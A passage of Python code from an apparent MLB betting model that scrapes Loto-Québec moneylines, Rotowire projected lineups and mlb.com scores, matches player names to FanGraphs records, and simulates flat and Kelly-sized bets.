\"KikeHernandez\":\r\n\t\t\t\treturn \"EnriqueHernandez\" + str(frame.at[row, \"Team\"])\r\n\r\n\t\t\tif frame.at[row, \"Full_Name\"] == \"A.Toro-Hernandez\":\r\n\t\t\t\treturn \"AbrahamToro\" + str(frame.at[row, \"Team\"])\t\t\t\t\r\n\r\n\t\t\treturn out\r\n\r\n\r\n\r\n\t\t#Find missing names\r\n\t\tbat_na = np.where(bat[\"Name_Key\"].isnull())[0]\r\n\t\tif len(bat_na) > 0:\r\n\r\n\t\t\tpath_check = self.paths[0] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\t\tbatters = pd.read_csv(path_check)[\"Name\"]\r\n\t\t\tbatters = np.array(list(set(list(batters))))\r\n\r\n\t\t\tfor i in tqdm(bat_na):\r\n\t\t\t\tbat.at[i, \"Name_Key\"] = find_name(bat, i, batters) \r\n\r\n\r\n\r\n\t\tpitch_na = np.where(pitch[\"Name_Key\"].isnull())[0]\r\n\t\tif len(pitch_na) > 0:\r\n\r\n\t\t\tpath_check = self.paths[1] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\t\tpitchers = pd.read_csv(path_check)[\"Name\"]\r\n\t\t\tpitchers = np.array(list(set(list(pitchers))))\t\r\n\r\n\t\t\tfor i in tqdm(pitch_na):\r\n\t\t\t\tpitch.at[i, \"Name_Key\"] = find_name(pitch, i, pitchers) \r\n\r\n\r\n\r\n\t\tpath_save = self.paths[3] + \"/Predicted_Lineups\"\r\n\t\tbat.to_csv(path_save + \"/All_Batters.csv\", index = False)\r\n\t\tpitch.to_csv(path_save + \"/All_Pitchers.csv\", index = False)\r\n\t\tmoneylines.to_csv(path_save + \"/All_Moneylines.csv\", index = False)\r\n\r\n\r\n\r\n\r\n\tdef Billet_Loto_Quebec(self):\r\n\r\n\t\tdate = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\r\n\t\tpath_check = self.paths[3] + \"/Predicted_Lineups/\" + \"Loto_Quebec_\" + date + \"/Billet.csv\" \r\n\t\tif path.exists(path_check):\r\n\t\t\tsys.exit(\"Forbiden: Cannot overwrite Billet.csv ---- File is final.\")\r\n\r\n\t\turl = \"https://miseojeu.lotoquebec.com/fr/offre-de-paris/baseball/mlb/matchs?idAct=11\"\r\n\r\n\t\theaders = {\r\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n \t}\r\n\r\n\t\tprint(\"Accessing Loto-Quebec website...\")\r\n\r\n\t\t#Obtain page data\r\n\t\thtml = requests.get(url , stream = True, headers = headers).content\r\n\t\ttry:\r\n\t\t\ttables = pd.read_html(html)\r\n\t\t\tsoup = BeautifulSoup(html)\r\n\t\texcept:\r\n\t\t\tsys.exit(\"Error: No bets found ---- Too early, or no games today.\")\r\n\r\n\t\t#Obtain moneylines\r\n\t\tmoneylines = [x for x in tables if len(x.columns) == 4]\r\n\t\tmoneylines = [x for x in moneylines if \"Baseball MLB\" in x.iloc[0,1]]\r\n\r\n\t\tbillet = pd.DataFrame([moneylines[0].iloc[0,1], moneylines[0].iloc[0,2]]).T\r\n\r\n\t\tfor x in moneylines[1:]:\r\n\t\t\ttemp = pd.DataFrame([x.iloc[0,1], x.iloc[0,2]]).T\r\n\r\n\t\t\tif \"pt(s)\" in temp.iloc[0,0]:\r\n\t\t\t\tbreak\r\n\t\t\t\r\n\t\t\telse:\r\n\t\t\t\tbillet = billet.append(temp, ignore_index = True)\r\n\r\n\t\tbillet.columns = [\"Home\", \"Away\"]\r\n\r\n\t\tteams = []\r\n\t\treturns = []\r\n\r\n\t\tfor j in range(0, 2):\r\n\r\n\t\t\ttemp = billet.iloc[:,j]\r\n\t\t\tnm = temp.str.split(\" \")\r\n\r\n\t\t\tt = []\r\n\t\t\tr = []\r\n\t\t\tfor i in range(0, len(temp)):\r\n\r\n\t\t\t\tt.append(nm[i][2])\r\n\t\t\t\tr.append(float(nm[i][3].replace(\",\", \".\")))\r\n\r\n\r\n\t\t\tteams.append(t)\r\n\t\t\treturns.append(r)\r\n\r\n\r\n\t\tout = pd.DataFrame([teams[1], returns[1], teams[0], returns[0]]).T\r\n\t\tout.columns = [\"Team_Home\", \"Factor_Home\", \"Team_Away\", \"Factor_Away\"]\r\n\t\tout[\"Date\"] = str(datetime.now()).split(\" \")[0]\r\n\r\n\t\tpath_check = self.paths[3] + \"/Predicted_Lineups/\" + \"Loto_Quebec_\" + out[\"Date\"][0] \r\n\t\tif not path.exists(path_check):\r\n\t\t\tos.mkdir(path_check)\r\n\r\n\t\tout.to_csv(path_check + \"/Billet.csv\", index = False)\r\n\r\n\t\tprint(\"Done.\")\r\n\r\n\r\n\r\n\tdef Ajouter_Lineups(self):\r\n\r\n\t\tdate = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\r\n\t\tpath_check = self.paths[3] + \"/Predicted_Lineups/\" + \"Loto_Quebec_\" + date\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Aucun Billet.\")\r\n\r\n\t\tbillet = pd.read_csv(path_check + \"/Billet.csv\")\r\n\t\toriginal = billet[[\"Team_Home\", \"Team_Away\"]].copy()\r\n\t\toriginal.columns = [\"LotoQ_Symbol_Home\", \"LotoQ_Symbol_Away\"]\r\n\t\tbillet = billet.join(original)\r\n\r\n\t\t#Translate team names\r\n\t\tbillet = self.Fix_Team_Names(billet, \"City\")\r\n\r\n\t\t#Attempt to obtain predicted lineups\r\n\t\turl = \"https://www.rotowire.com/baseball/daily-lineups.php\"\r\n\t\theaders = {\r\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n \t}\r\n\r\n\t\tprint(\"Accessing: \" + url + \" ...\")\r\n\r\n\t\t#Extract projected roosters\r\n\t\thtml = requests.get(url, headers = headers).content\r\n\t\tsoup = BeautifulSoup(html)\r\n\r\n\t\t#Extract the rooster html object\r\n\t\ttables = soup.find_all(\"div\", class_ = \"lineup__box\")\r\n\t\t#Filter garbage\r\n\t\ttables = [x for x in tables if len(x.find_all(\"div\", class_ = \"lineup__abbr\")) == 2 and len(x.find_all(\"li\", {\"class\" : \"lineup__status\"})) == 2]\r\n\r\n\t\tif len(tables) == 0:\r\n\t\t\tsys.exit(\"No predicted lineups found.\")\r\n\r\n\t\tprint(str(len(tables)) + \" Lineups found...\")\r\n\r\n\t\t#Initialize containers\r\n\t\tteams = []\r\n\t\tbat = []\r\n\t\tpitch = []\r\n\r\n\t\t#Retrieve data\r\n\t\tID = 0\r\n\t\tfor x in tables:\r\n\r\n\t\t\tframe_bat = pd.DataFrame(index = np.arange(0,9), \r\n\t\t\t\t\t\t\t\t\t\tcolumns = [\"Batter_Home\", \"Batter_Away\"])\r\n\r\n\t\t\tframe_pitch = pd.DataFrame(index = np.arange(0,1), \r\n\t\t\t\t\t\t\t\t\t\tcolumns = [\"Pitcher_Home\", \"Pitcher_Away\"])\t\r\n\r\n\t\t\tframe_team = pd.DataFrame(index = np.arange(0,1), \r\n\t\t\t\t\t\t\t\t\t\tcolumns = [\"Team_Home\", \"Team_Away\"])\t\t\t\t\r\n\r\n\t\t\thome = x.find(\"ul\", class_ = \"lineup__list is-home\")\r\n\t\t\taway = x.find(\"ul\", class_ = \"lineup__list is-visit\")\r\n\r\n\t\t\tdata = [home, away]\r\n\r\n\t\t\tfor i in range(0,2):\r\n\r\n\t\t\t\t#Batter names\r\n\t\t\t\tbatters = data[i].find_all(\"li\", class_ = \"lineup__player\")\r\n\t\t\t\tfor j in range(0, len(batters)):\r\n\t\t\t\t\tframe_bat.iloc[j,i] = batters[j].text.split(\"\\n\")[2]\r\n\r\n\t\t\t\t#Starting pitcher names\r\n\t\t\t\tpitchers = data[i].find(\"div\", class_ = \"lineup__player-highlight-name\").text.split(\"\\n\")[1]\r\n\t\t\t\tframe_pitch.iloc[0,i] = pitchers\r\n\r\n\r\n\t\t\t#Teams\r\n\t\t\tframe_team.iloc[0,0] = x.find(\"div\", class_ = \"lineup__team is-home\").text.split(\"\\n\")[2]\r\n\t\t\tframe_team.iloc[0,1] = x.find(\"div\", class_ = \"lineup__team is-visit\").text.split(\"\\n\")[2]\r\n\r\n\t\t\tframe_bat[\"Team_Home\"] = str(frame_team.iloc[0,0])\r\n\t\t\tframe_bat[\"Team_Away\"] = str(frame_team.iloc[0,1])\r\n\r\n\t\t\tframe_pitch[\"Team_Home\"] = str(frame_team.iloc[0,0])\r\n\t\t\tframe_pitch[\"Team_Away\"] = str(frame_team.iloc[0,1])\r\n\r\n\t\t\t\r\n\t\t\t#Tag matches\r\n\t\t\tframe_team[\"ID\"] = ID\r\n\t\t\tframe_bat[\"ID\"] = ID\r\n\t\t\tframe_pitch[\"ID\"] = ID\r\n\r\n\t\t\t#Update ID\r\n\t\t\tID += 1\r\n\r\n\t\t\t#####\r\n\t\t\t#CHECK IF THE LINEUP ARE EXPECTED OR CONFIRMED\r\n\t\t\tstatus = x.find_all(\"li\", {\"class\" : \"lineup__status\"})\r\n\r\n\t\t\tframe_team[\"Lineup_Away\"] = status[0][\"class\"][-1]\r\n\t\t\tframe_bat[\"Lineup_Away\"] = status[0][\"class\"][-1]\r\n\t\t\tframe_pitch[\"Lineup_Away\"] = status[0][\"class\"][-1]\t\r\n\r\n\r\n\r\n\t\t\tframe_team[\"Lineup_Home\"] = status[1][\"class\"][-1]\r\n\t\t\tframe_bat[\"Lineup_Home\"] = status[1][\"class\"][-1]\r\n\t\t\tframe_pitch[\"Lineup_Home\"] = status[1][\"class\"][-1]\t\t\t\r\n\r\n\r\n\t\t\t#Append results\r\n\t\t\tif len(teams) == 0:\r\n\t\t\t\tteams = frame_team\r\n\t\t\telse:\r\n\t\t\t\tteams = teams.append(frame_team, ignore_index = True)\r\n\r\n\t\t\tif len(bat) == 0:\r\n\t\t\t\tbat = frame_bat\r\n\t\t\telse:\r\n\t\t\t\tbat = bat.append(frame_bat, ignore_index = True)\r\n\r\n\t\t\tif len(pitch) == 0:\r\n\t\t\t\tpitch = frame_pitch\r\n\t\t\telse:\r\n\t\t\t\tpitch = pitch.append(frame_pitch, ignore_index = True)\t\t\t\r\n\r\n\r\n\t\t#Fix team names\r\n\t\tteams = self.Fix_Team_Names(teams, \"City\")\r\n\t\tbat = self.Fix_Team_Names(bat, \"City\")\r\n\t\tpitch = self.Fix_Team_Names(pitch, \"City\")\r\n\r\n\t\tprint(teams)\r\n\r\n\r\n\t\t#Fix player names\r\n\t\tprint(\"Translating names to FanGraph values ...\")\r\n\r\n\t\tpath_check = self.paths[0] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\tbatters = pd.read_csv(path_check)[\"Name\"]\r\n\t\tbatters = np.array(list(set(list(batters))))\r\n\r\n\t\tpath_check = self.paths[1] + \"/Clean_Data/FanGraphs_Box_Scores.csv\"\r\n\t\tpitchers = pd.read_csv(path_check)[\"Name\"]\r\n\t\tpitchers = np.array(list(set(list(pitchers))))\r\n\r\n\r\n\t\tdef find_name(name, team, all_names):\r\n\r\n\t\t\tcurrent = \"None\"\r\n\r\n\t\t\tdummy = np.char.lower(all_names)\r\n\r\n\t\t\tfamily_name = name.split(\" \")[-1]\r\n\t\t\tfirst_letter = name[0]\r\n\r\n\t\t\twhile True:\r\n\r\n\t\t\t\t#First Search\r\n\t\t\t\tsearch_val = (name.replace(\" \", \"\") + team).lower()\r\n\t\t\t\tmatches = np.where(dummy == search_val)[0]\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\r\n\r\n\t\t\t\t#Second search, by family name\r\n\t\t\t\tsearch_val = (family_name + team).lower()\r\n\t\t\t\tmatches = []\r\n\t\t\t\tfor i in range(0, len(dummy)):\r\n\t\t\t\t\tif search_val in dummy[i]:\r\n\t\t\t\t\t\tmatches.append(i)\r\n\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\r\n\r\n\t\t\t\t#Third search, with no alphanumerics\r\n\t\t\t\tsearch_val = \"\".join([x for x in search_val if x.isalpha()])\r\n\t\t\t\tmatches = []\r\n\t\t\t\tfor i in range(0, len(dummy)):\r\n\t\t\t\t\tif search_val in \"\".join([x for x in dummy[i] if x.isalpha()]):\r\n\t\t\t\t\t\tmatches.append(i)\t\r\n\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\t\r\n\r\n\r\n\t\t\t\t#Added: family name, no team\r\n\t\t\t\tsearch_val = (family_name).lower()\t\r\n\t\t\t\tmatches = []\r\n\t\t\t\tfor i in range(0, len(dummy)):\r\n\t\t\t\t\tif search_val in \"\".join([x for x in dummy[i] if x.isalpha()]):\r\n\t\t\t\t\t\tmatches.append(i)\t\r\n\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\t\t\t\t\t\t\r\n\r\n\r\n\t\t\t\t#Added: search for junior\r\n\t\t\t\tsearch_val = (family_name + \"jr\").lower()\t\r\n\t\t\t\tmatches = []\r\n\t\t\t\tfor i in range(0, len(dummy)):\r\n\t\t\t\t\tif search_val in \"\".join([x for x in dummy[i] if x.isalpha()]):\r\n\t\t\t\t\t\tmatches.append(i)\t\r\n\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\t\r\n\r\n\r\n\r\n\t\t\t\t#Alternative search, with possible 2nd family name\r\n\t\t\t\tfamily_name = name.split(\" \")[-2]\r\n\r\n\t\t\t\t#3rd search, by family name\r\n\t\t\t\tsearch_val = (family_name + team).lower()\r\n\t\t\t\tmatches = []\r\n\t\t\t\tfor i in range(0, len(dummy)):\r\n\t\t\t\t\tif search_val in dummy[i]:\r\n\t\t\t\t\t\tmatches.append(i)\r\n\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\t\r\n\r\n\t\t\t\t#4th, with no alphanumerics\r\n\t\t\t\tsearch_val = \"\".join([x for x in search_val if x.isalpha()])\r\n\t\t\t\tmatches = []\r\n\t\t\t\tfor i in range(0, len(dummy)):\r\n\t\t\t\t\tif search_val in \"\".join([x for x in dummy[i] if x.isalpha()]):\r\n\t\t\t\t\t\tmatches.append(i)\t\t\t\r\n\r\n\t\t\t\tif len(matches) > 0:\r\n\t\t\t\t\tbreak\t\r\n\r\n\t\t\t\tbreak\r\n\r\n\r\n\t\t\tif len(matches) > 0:\r\n\t\t\t\tfor i in matches:\r\n\t\t\t\t\tif all_names[i][0] == first_letter and all_names[i][-3:] == team:\r\n\t\t\t\t\t\tcurrent = all_names[i]\r\n\r\n\t\t\treturn current\r\n\r\n\r\n\t\t#Initialize copies, esier to test on...\r\n\t\tfangraph_bat = bat.copy()\r\n\t\tfangraph_pitch = pitch.copy()\r\n\r\n\t\tfor j in tqdm(range(0, len(bat))):\r\n\t\t\tfangraph_bat.iloc[j, 0] = find_name(bat.at[j, \"Batter_Home\"], bat.at[j, \"Team_Home\"], batters)\r\n\t\t\tfangraph_bat.iloc[j, 1] = find_name(bat.at[j, \"Batter_Away\"], bat.at[j, \"Team_Away\"], batters)\r\n\r\n\t\tfor j in tqdm(range(0, len(pitch))):\r\n\t\t\tfangraph_pitch.iloc[j, 0] = find_name(pitch.at[j, \"Pitcher_Home\"], pitch.at[j, \"Team_Home\"], pitchers)\r\n\t\t\tfangraph_pitch.iloc[j, 1] = find_name(pitch.at[j, \"Pitcher_Away\"], pitch.at[j, \"Team_Away\"], pitchers)\r\n\r\n\r\n\t\trmv = []\r\n\t\t#Remove matches where the starting pitcher wasn't found in the database\r\n\t\tpitch_missing = np.where(np.logical_or(fangraph_pitch[\"Pitcher_Home\"] == \"None\", fangraph_pitch[\"Pitcher_Away\"] == \"None\"))[0]\r\n\t\tif len(pitch_missing) > 0:\r\n\t\t\tfor x in pitch_missing:\r\n\t\t\t\trmv.append(fangraph_pitch.at[x, \"ID\"])\t\r\n\r\n\t\trmv = list(set(list(rmv)))\t\r\n\r\n\t\tif len(rmv)\t> 0:\r\n\t\t\tindex = [x for x in np.arange(0, len(fangraph_bat)) if fangraph_bat.at[x, \"ID\"] not in rmv]\r\n\t\t\tfangraph_bat = fangraph_bat.iloc[index].reset_index(drop = True)\r\n\r\n\t\t\tindex = [x for x in np.arange(0, len(fangraph_pitch)) if fangraph_pitch.at[x, \"ID\"] not in rmv]\r\n\t\t\tfangraph_pitch = fangraph_pitch.iloc[index].reset_index(drop = True)\r\n\r\n\t\t\tindex = [x for x in np.arange(0, len(teams)) if teams.at[x, \"ID\"] not in rmv]\r\n\t\t\tteams = teams.iloc[index].reset_index(drop = True)\t\r\n\r\n\r\n\r\n\t\t#Keep track of how many batters couldn't be found in the database\t\r\n\r\n\t\tteams[\"Batters_Missing_Home\"] = 0\r\n\t\tteams[\"Batters_Missing_Away\"] = 0\r\n\r\n\t\tbat_missing = np.where(np.logical_or(fangraph_bat[\"Batter_Home\"] == \"None\", fangraph_bat[\"Batter_Away\"] == \"None\"))[0]\r\n\t\tif len(bat_missing) > 0:\r\n\r\n\t\t\tfor i in bat_missing:\r\n\r\n\t\t\t\ti_team = np.where(teams[\"ID\"] == fangraph_bat.at[i, \"ID\"])[0][0]\r\n\r\n\t\t\t\tif fangraph_bat.at[i, \"Batter_Home\"] == \"None\":\r\n\t\t\t\t\tteams.at[i_team, \"Batters_Missing_Home\"] += 1\r\n\r\n\t\t\t\tif fangraph_bat.at[i, \"Batter_Away\"] == \"None\":\r\n\t\t\t\t\tteams.at[i_team, \"Batters_Missing_Away\"] += 1\t\t\t\t\r\n\r\n\t\tteams[\"Batters_Missing_Total\"] = teams[\"Batters_Missing_Home\"] + teams[\"Batters_Missing_Away\"]\r\n\r\n\r\n\r\n\t\t#Match billet and teams\r\n\t\tbillet = pd.merge(billet, teams, how = \"inner\", on = [\"Team_Home\", \"Team_Away\"]).drop_duplicates([\"Team_Home\", \"Team_Away\"],keep= 'first')\r\n\r\n\t\t#Keep roosters\r\n\t\tindex = [x for x in np.arange(0, len(fangraph_bat)) if fangraph_bat.at[x, \"ID\"] in list(billet[\"ID\"])]\r\n\t\tfangraph_bat = fangraph_bat.iloc[index].reset_index(drop = True)\r\n\r\n\t\tindex = [x for x in np.arange(0, len(fangraph_pitch)) if fangraph_pitch.at[x, \"ID\"] in list(billet[\"ID\"])]\r\n\t\tfangraph_pitch = fangraph_pitch.iloc[index].reset_index(drop = True)\r\n\r\n\r\n\t\t#Add metrics\r\n\t\tbillet[\"Returns_Home\"] = billet[\"Factor_Home\"] - 1\r\n\t\tbillet[\"Returns_Away\"] = billet[\"Factor_Away\"] - 1\r\n\r\n\t\tbillet[\"Odds_Home\"] = 1 / billet[\"Factor_Home\"] \r\n\t\tbillet[\"Odds_Away\"] = 1 / billet[\"Factor_Away\"] \r\n\r\n\t\tbillet[\"OverOdds\"] = billet[\"Odds_Home\"] + billet[\"Odds_Away\"] - 1\r\n\r\n\t\tbillet[\"Odds_Home_FAIR\"] = billet[\"Odds_Home\"] / (billet[\"Odds_Home\"] + billet[\"Odds_Away\"])\r\n\t\tbillet[\"Odds_Away_FAIR\"] = billet[\"Odds_Away\"] / (billet[\"Odds_Home\"] + billet[\"Odds_Away\"])\t\r\n\r\n\t\t#Add date\r\n\t\tfangraph_bat[\"Date\"] = date\r\n\t\tfangraph_pitch[\"Date\"] = date\r\n\r\n\t\t#Save\r\n\t\tpath_save = self.paths[3] + \"/Predicted_Lineups/\" + \"Loto_Quebec_\" + date + \"/\"\r\n\t\tbillet.to_csv(path_save + \"Billet_Final.csv\", index = False)\r\n\t\tfangraph_bat.to_csv(path_save + \"Bat.csv\", index = False)\r\n\t\tfangraph_pitch.to_csv(path_save + \"Pitch.csv\", index = False)\r\n\r\n\t\tprint(billet)\r\n\r\n\r\n\r\n\r\n\tdef Assemble_Billet_Backtesting_Loto_Quebec(self):\r\n\r\n\t\tpath_dir = self.paths[3] + \"/Predicted_Lineups/\"\r\n\t\tpaths = [x for x in os.listdir(path_dir) if \"Loto_Quebec\" in x and \".csv\" not in x]\r\n\r\n\t\tif len(paths) == 0:\r\n\t\t\tsys.exit(\"Aucun billet...\")\r\n\r\n\t\tbillet = []\r\n\t\tbat = []\r\n\t\tpitch = []\r\n\r\n\t\tfor x in paths:\r\n\t\t\tif len(billet) == 0:\r\n\t\t\t\tbillet = pd.read_csv(path_dir + x + \"/Billet_Final.csv\")\r\n\t\t\telse:\r\n\t\t\t\tbillet = billet.append(pd.read_csv(path_dir + x + \"/Billet_Final.csv\"), ignore_index = True)\r\n\r\n\t\t\tif len(bat) == 0:\r\n\t\t\t\tbat = pd.read_csv(path_dir + x + \"/Bat.csv\")\r\n\t\t\telse:\r\n\t\t\t\tbat = bat.append(pd.read_csv(path_dir + x + \"/Bat.csv\"), ignore_index = True)\r\n\r\n\t\t\tif len(pitch) == 0:\r\n\t\t\t\tpitch = pd.read_csv(path_dir + x + \"/Pitch.csv\")\r\n\t\t\telse:\r\n\t\t\t\tpitch = pitch.append(pd.read_csv(path_dir + x + \"/Pitch.csv\"), ignore_index = True)\t\t\t\t\r\n\r\n\r\n\r\n\t\tpath_save = self.paths[3] + \"/Predicted_Lineups/\"\r\n\t\tbillet.to_csv(path_save + \"Historique_Loto_Quebec_Moneylines.csv\", index = False)\r\n\t\tbat.to_csv(path_save + \"Historique_Loto_Quebec_Bat.csv\", index = False)\r\n\t\tpitch.to_csv(path_save + \"Historique_Loto_Quebec_Pitch.csv\", index = False)\r\n\r\n\t\tprint(billet)\r\n\t\t\r\n\r\n\tdef Evaluer_Billet_Adj(self, n):\r\n\r\n\t\tdate = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\r\n\t\tpath_check = self.paths[0].replace(\"Bat\", \"\") + \"Regression/\" + str(n) + \"/Betting_Fitted_Odds.csv\"\r\n\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + path_save)\r\n\r\n\t\tbillet = pd.read_csv(path_check)\r\n\r\n\t\tindex = np.where(billet[\"Date\"] == date)[0]\r\n\t\tif len(index) == 0:\r\n\t\t\tsys.exit(\"No bets placed on:\" + \"\\t\" + date)\r\n\r\n\t\tbillet = billet.iloc[index].reset_index(drop = True)\r\n\r\n\t\t#Check for live scores\r\n\t\turl = \"https://www.mlb.com/scores\" \r\n\r\n\t\theaders = {\r\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n \t}\r\n\r\n\t\tprint(\"Accessing \" + url + \"...\")\r\n\r\n\t\t#Obtain page data\r\n\t\thtml = requests.get(url, headers = headers).content\r\n\t\tsoup = BeautifulSoup(html)\r\n\r\n\t\ttables = soup.find_all(\"div\", {\"data-test-mlb\" : \"singleGameContainer\"})\r\n\t\tdata = pd.DataFrame(index = np.arange(0, len(tables)), columns = [\"Team_Home\", \"Team_Away\", \"Score_Home\", \"Score_Away\", \"Status\"])\r\n\t\tdata[\"Status\"] = \"Not_Final\"\r\n\r\n\t\tfor i in range(0, len(data)):\r\n\r\n\t\t\ttry:\r\n\r\n\t\t\t\tteams = tables[i].find_all(\"div\", {\"data-mlb-test\" : \"teamNameLabel\"})\r\n\r\n\t\t\t\tdata.at[i, \"Team_Away\"] = teams[0].text\r\n\t\t\t\tdata.at[i, \"Team_Home\"] = teams[1].text\r\n\r\n\t\t\t\tdata.at[i, \"Score_Away\"] = int(tables[i].find_all(\"td\", {\"data-col\" : \"0\", \"data-row\" : \"0\"})[0].text)\r\n\t\t\t\tdata.at[i, \"Score_Home\"] = int(tables[i].find_all(\"td\", {\"data-col\" : \"0\", \"data-row\" : \"1\"})[0].text)\r\n\r\n\t\t\t\ttables[i].find_all(\"div\", {\"data-mlb-test\" : \"gameStartTimesStateContainer\"})\r\n\r\n\t\t\t\tif \"Final\" in tables[i].find_all(\"div\", {\"data-mlb-test\" : \"gameStartTimesStateContainer\"})[0].text:\r\n\r\n\t\t\t\t\tdata.at[i, \"Status\"] = \"Final\"\r\n\r\n\r\n\r\n\t\t\texcept:\r\n\r\n\t\t\t\tcontinue\r\n\r\n\r\n\t\trmv = np.where(data[\"Score_Away\"].isnull())[0]\r\n\t\tif len(rmv) > 0:\r\n\t\t\tdata = data.drop(rmv).reset_index(drop = True)\r\n\r\n\t\trmv = np.where(data[\"Status\"] == \"Not_Final\")[0]\r\n\t\tif len(rmv) > 0:\r\n\t\t\tdata = data.drop(rmv).reset_index(drop = True)\t\t\r\n\r\n\t\tdata = self.Fix_Team_Names(data, \"City\")\r\n\r\n\t\t#Join tables\r\n\t\tbillet = pd.merge(billet, data, how = \"inner\", on = [\"Team_Home\", \"Team_Away\"])\r\n\t\tbillet[\"Win\"] = 1\r\n\r\n\t\tloss = np.where(billet[\"Score_Home\"] <= billet[\"Score_Away\"])[0]\r\n\t\tif len(loss) > 0:\r\n\t\t\tbillet.loc[loss, \"Win\"] = 0\r\n\r\n\t\t#Simulate 10$ bets\r\n\t\t#Arbitrage\r\n\t\tbillet[\"10$_Bets_Delta\"] = 10 * (billet[\"Factor_Home\"] * billet[\"Win\"] * billet[\"Linear_Home\"] + billet[\"Factor_Away\"] * (1 - billet[\"Win\"]) * billet[\"Linear_Away\"] - 1)\r\n\t\tbillet[\"10$_Bets_Cumsum\"] = np.cumsum(billet[\"10$_Bets_Delta\"])\r\n\t\tbillet[\"Arbitrage_Returns\"] = billet[\"10$_Bets_Cumsum\"] / (10 * (1 + np.arange(0, len(billet))))\r\n\r\n\t\t#Kelly\r\n\t\tmoney = len(billet) * 10\r\n\t\tscale = billet[[\"Kelly_Home\", \"Kelly_Away\"]].sum().sum()\r\n\r\n\t\tbillet.loc[:, [\"Kelly_Home\", \"Kelly_Away\"]] = billet.loc[:, [\"Kelly_Home\", \"Kelly_Away\"]] / scale\r\n\r\n\t\tbillet[\"Kelly_Bets_Delta\"] = money * (billet[\"Factor_Home\"] * billet[\"Win\"] * billet[\"Kelly_Home\"] + billet[\"Factor_Away\"] * (1 - billet[\"Win\"]) * billet[\"Kelly_Away\"] - (billet[\"Kelly_Home\"] + billet[\"Kelly_Away\"]))\r\n\t\tbillet[\"Kelly_Bets_Cumsum\"] = np.cumsum(billet[\"Kelly_Bets_Delta\"])\r\n\t\tbillet[\"Kelly_Returns\"] = billet[\"Kelly_Bets_Cumsum\"] / (10 * (1 + np.arange(0, len(billet))))\r\n\r\n\t\tprint(\"####################################################################################\")\r\n\t\tprint(\"####################################################################################\")\r\n\t\tprint(\"###################\" + \"\\t\" + \"\\t\" + \"BETTING RESULTS\" + \"\\t\" + \"\\t\" + \"############################\")\r\n\t\tprint(\"###################\" + \"\\t\" + \"\\t\" + date + \"\\t\" + \"\\t\" + \"############################\")\r\n\t\tprint(\"####################################################################################\")\r\n\t\tprint(\"####################################################################################\")\r\n\t\tprint(\"\")\r\n\t\tprint(\"\")\r\n\t\tprint(\"\")\r\n\t\tprint(\"\")\r\n\r\n\t\tprint(billet[[\"Team_Home\", \"Team_Away\", \"10$_Bets_Cumsum\", \"Arbitrage_Returns\", \"Kelly_Bets_Cumsum\", \"Kelly_Returns\"]])\r\n\r\n\t\tbillet.to_csv(self.paths[3] + \"/Predicted_Lineups/Loto_Quebec_Gains_today.csv\")\r\n\r\n\r\n\r\n\tdef Reddit_Print_Billet_Final(self, n):\r\n\r\n\t\tdate = datetime.strftime(datetime.now(), \"%Y-%m-%d\")\r\n\t\tpath_check = self.paths[0].replace(\"Bat\", \"\") + \"Regression/\" + str(n) + \"/Betting_Fitted_Odds.csv\"\r\n\r\n\t\tif not path.exists(path_check):\r\n\t\t\tsys.exit(\"Missing file:\" + \"\\t\" + path_save)\r\n\r\n\t\tbillet = pd.read_csv(path_check)\r\n\t\tkeep = np.where(billet[\"Date\"] == date)[0]\r\n\t\tif len(keep) == 0:\r\n\t\t\tsys.exit(\"No bets made on that day.\")\r\n\r\n\t\tbillet = billet.iloc[keep].reset_index(drop = True)\r\n\r\n\t\tout = billet[[\"Team_Home\", \"Team_Away\", \"Factor_Home\", \"Factor_Away\"]].copy()\r\n\t\tout.columns = [\"Team_Home\", \"Team_Away\", \"R_LotoQ_Home\", \"R_LotoQ_Away\"]\r\n\t\tout[\"R_Model_Home\"] = (1 / billet[\"Odds\"]).round(2)\r\n\t\tout[\"R_Model_Away\"] = (1 / (1 - billet[\"Odds\"])).round(2)\r\n\t\tout[\"Bet_on\"] = out[\"Team_Home\"]\r\n\t\tout[\"R+\"] = out[\"R_LotoQ_Home\"] - out[\"R_Model_Home\"]\r\n\r\n\t\tbet_away = np.where(billet[\"Linear_Away\"] == 1)[0]\r\n\t\tif len(bet_away) > 0:\r\n\t\t\tout.loc[bet_away, \"Bet_on\"] = out.loc[bet_away, \"Team_Away\"].copy()\r\n\t\t\tout.loc[bet_away, \"R+\"] = out.loc[bet_away, \"R_LotoQ_Away\"].copy() - out.loc[bet_away, \"R_Model_Away\"].copy()\r\n\r\n\t\tout[\"NaN\"] = billet[\"Batters_Missing_Total\"]\r\n\t\tout[\"Cf\"] = \"None\"\r\n\r\n\t\tfor i in range(0, len(out)):\r\n\t\t\tif billet.at[i, \"Lineup_Home\"] == \"is-confirmed\" and billet.at[i, \"Lineup_Away\"] == \"is-confirmed\":\r\n\t\t\t\tout.at[i, \"Cf\"] = \"Both\"\r\n\t\t\telif billet.at[i, \"Lineup_Home\"] == \"is-confirmed\":\r\n\t\t\t\tout.at[i, \"Cf\"] = \"Home\"\r\n\t\t\telif billet.at[i, \"Lineup_Away\"] == \"is-confirmed\":\r\n\t\t\t\tout.at[i, \"Cf\"] = 